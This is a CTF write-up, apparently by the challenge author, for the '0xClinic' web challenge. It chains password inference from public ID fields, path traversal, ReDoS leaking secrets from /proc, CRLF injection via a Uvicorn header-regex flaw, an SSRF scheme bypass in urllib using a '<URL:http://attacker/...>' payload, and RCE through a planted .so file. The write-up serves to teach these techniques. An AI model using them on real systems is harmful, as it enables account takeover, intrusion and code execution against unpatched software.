Tags: researching 0day web research 

Rating: 4.5

# Exploiting Two 0-Days in 0xL4ugh CTF v5 - 0xClinic

![thumbnail](https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/thumbnail.png?raw=true)

## TL;DR
This challenge requires chaining multiple issues, including 2 0-day vulnerabilities discovered and reported by us that haven't fixed yet:
- **Password inference** from public data exposed by an API
- **Path traversal**
- **ReDoS**
- **CRLF injection → XSS / cache poisoning / CSP bypass** using a **Uvicorn** n-day
- **SSRF protection bypass** using a **urllib** n-day (scheme validation bypass)
- **RCE** via writing shared object (`.so`) files (technique explained by Siunam)

---

## Introduction
This challenge is inspired by realistic bugs encountered in pentesting and by known n-days in specific products/libraries.
Hope you enjoyed solving it

---

## Chapter 1 — The Part You Might Hate (Inference)

### Inspiration
The goal is to introduce **inference**: extracting sensitive information by combining multiple public data points.
This is based on a real bug-bounty scenario where an initial password was generated by concatenating the user’s first and last name.

### Vulnerability
In the registration logic, the **National ID** is used as the account password.
So, obtaining the National ID effectively means **account takeover (ATO)**.

To access privileged functionality, we must log in as a **verified account**. Our account is not verified, and there’s no legitimate way to verify it.

An educational link about the Egyptian National ID format was provided:
https://en.wikipedia.org/wiki/Egyptian_National_Identity_Card

From that format, we can infer:
- **Digit 1 (Century):** `2` if born before 2000, `3` otherwise
- **Digits 2–7 (Birthdate):** `YYMMDD`
- **Digits 8–9 (Governorate code):** `01–27` based on place of birth
- **Digits 10–14:** mostly random, except:
- **Digit 13** is **odd for males** and **even for females**

All of those pieces can be derived from public information.

### Exploitation
By inspecting the application, we find the profile endpoint exposes those “public” fields.
What remains unknown are **5 digits** in the form: `AAABA`:
- `A` is any digit `0–9`
- `B` is constrained:
- **odd** for males → 5 possibilities
- **even** for females → 5 possibilities

So we brute-force:
- `10^4 * 5 = 50,000` possibilities

Which is very feasible.

![Public profile fields exposed via API](https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/image.png?raw=true)

---

## Chapter 2 — Every Mystery Starts With a Path Traversal

### Inspiration
Path traversal is often underrated. I’ve seen real cases where it was treated as “low impact,” but it becomes critical when chained.

A similar bug bounty scenario I faced: path traversal in a profile picture endpoint was initially “just DoS” (forcing logout), but it became high impact once chained with endpoints that accept URL parameters (leading to 0-click CSRF-like behavior).

### Vulnerability
A path traversal issue exists in how `username` is used:

```py
data_file = DATA_DIR / username
```

This allows `data_file` to point to arbitrary files on the system.

The intended design was: doctors on the local system read/write those files natively not from the web app, so some examples were provided.
But the web app doesn’t properly constrain `username`, so the file path can escape the intended directory.

---

## ReDoS (2 Years Ago)

### Inspiration
A challenge that took me months to solve ended up being “just a regex issue.” That inspired my ReDoS write-up:
https://medium.com/@kalawy/regex-hacking-redos-cyborg-cybertalents-challenge-write-up-82418d62f1d7

Here, the aim is to demonstrate ReDoS in a realistic application flow.

### Vulnerability
A verified user can send a message to the clinic. The message **title** is treated as a **regex pattern**, and it’s matched against the patient file format to determine which doctor diagnosed an illness.

(An example patient file format was provided in the source code.)
```py
m = search(illness, text)
```
```py
@timeout(2)
def search(r, s):
return re.match(r, s)
```
Check the mentioned write-up for more technical details because i don't wanna repeat myself

### Exploit
When combined with path traversal, we can validate the regex against **any file on the system**, and leak its content through timing/behavior.

Useful target files include:
- Source code (already provided, so not the main target)
- Config files (the app avoids hardcoded secrets; most values are runtime-generated)
- **Process file descriptors (Linux `/proc`)**, which can expose sensitive runtime data

A very valuable target is the environment variables containing `ADMIN_KEY` (used as a cookie).

> A buddy suggested extracting `JWT_SECRET` via `/proc/<PID>/cmdline`.
> I didn’t fully test this, and it likely fails due to permission constraints and the difficulty of predicting PID reliably.

Helpful reference on file descriptors:
https://medium.com/geekculture/developer-diaries-processes-files-and-file-descriptors-in-linux-ebf007fb78f8

---

## CRLF → XSS / Cache Poisoning / CSP Bypass (N-Days Start Appearing)

### Inspiration
This was inspired by an n-day we discovered with **@ZeyadZonkorany** in **Uvicorn** (FastAPI dependency).
We reported it a long time ago, but it was ignored.

### Vulnerability
The issue leads to CRLF injection due to incorrect regex-based header validation in Uvicorn’s httptools implementation:
https://github.com/Kludex/uvicorn/blob/main/uvicorn/protocols/http/httptools_impl.py

```py
HEADER_RE = re.compile(b'[\x00-\x1f\x7f()<>@,;:[]={} \t\\"]')
HEADER_VALUE_RE = re.compile(b"[\x00-\x08\x0a-\x1f\x7f]")
```

Because of incorrect handling of `[]` inside the character class, validation can be bypassed and malicious bytes can slip through (including CRLF sequences), resulting in **CRLF injection**.

![CRLF behavior observed](https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/image-1.png?raw=true)

### Exploitation
In our environment, this CRLF bug enabled multiple impacts:

1. **CSP bypass**
CRLF can break/ignore `Content-Security-Policy` headers.

2. **Cache poisoning**
CRLF can force headers like:
```py
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
```
to be treated as part of the body. Then Nginx may fail to interpret the cache directives, caching responses unexpectedly.

3. **XSS**
CRLF lets an attacker inject arbitrary body content without proper filtering, enabling XSS.

By chaining these, we can trigger an XSS that affects any user who visits `/api/health`, even unauthenticated users.

---

## Scheme Restriction Bypass (Found ~5 Hours Before the CTF)

### Inspiration
It was the morning of the CTF — literally a 0-day XD. We were preparing for a journey, and I was casually hacking while commuting when I found it, so I decided to patch the challenge and include it

### Vulnerability
I observed that `urllib` accepts an “old URL format”:
`<URL:scheme://host:port?/path?>`
Example:
`<URL:http://google.com>`

However, Python’s `urlsplit` behaves unexpectedly with it:

```py
from urllib.parse import urlsplit

urls = ["<URL:http://google.com>", "google.com", "http://google.com"]
for url in urls:
print(urlsplit(url).scheme if urlsplit(url).scheme else "No scheme")

# No scheme
# No scheme
# http
```

So the old format is interpreted as having **no scheme** by `urlsplit`, even though `urlretrieve` will still fetch it as a URL.

The application performs scheme validation like this:

```py
if urlsplit(file_url).scheme in ["data", "http", "https", "ftp"]:
return Response(
content=json.dumps({"status": "error", "message": "Only file:// URLs are allowed"}),
status_code=400,
media_type="application/json",
)

urlretrieve(file_url, UPLOADS_DIR / filename)
return {
"status": "success",
"message": "Document reference accepted",
"filename": filename,
"file_url": file_url,
}
```

So the validator blocks `http/https/...`, but the “old format” bypasses the check.

### Exploit
Using:
`<URL:http://attacker/anyfile>`
bypasses the scheme limitation and allows retrieving remote resources.

> Note: Another solution was to inject a newline (`%0a`) at the beginning of the URL to break parsing in the validation logic.

---

## Path Traversal + File Upload → RCE (A Good Chain Ends With Code Execution)

### Inspiration
We wanted to end the chain with a satisfying RCE, so we used Siunam’s technique that leverages writing a malicious `.so` file into a Python environment.

### Vulnerability
At this stage, we have a restricted file upload with path traversal:
- Upload is limited by extension
- But path traversal can place the file in an attacker-chosen location

To turn arbitrary file write into RCE in Python, one reliable approach is:
- Writing shared object (`.so`) files to hijack/override Python import behavior or related mechanisms

Full technique details (already documented):
https://siunam321.github.io/research/python-dirty-arbitrary-file-write-to-rce-via-writing-shared-object-files-or-overwriting-bytecode-files/

---

## Wrapping It Up (Exploit Chain Summary)

1. **Infer the National ID** (password inference)
2. **Path traversal + ReDoS** to leak `ADMIN_KEY`
3. **CRLF injection** → CSP bypass + cache poisoning + XSS
4. **Bypass scheme validation** to achieve SSRF + controlled file retrieval/upload reference
5. Upload a malicious `.so` that overrides a bot functionality via path traversal to get an RCE
6. Trigger the bot again to reach **RCE**

> Some issues faced while I'm writing my exploit, for example, the body is turned into lowercase, so you will see that i replaced capital chars with their hex values.

Here is my solver https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/solver.py

Original writeup (https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/0xClinic.md).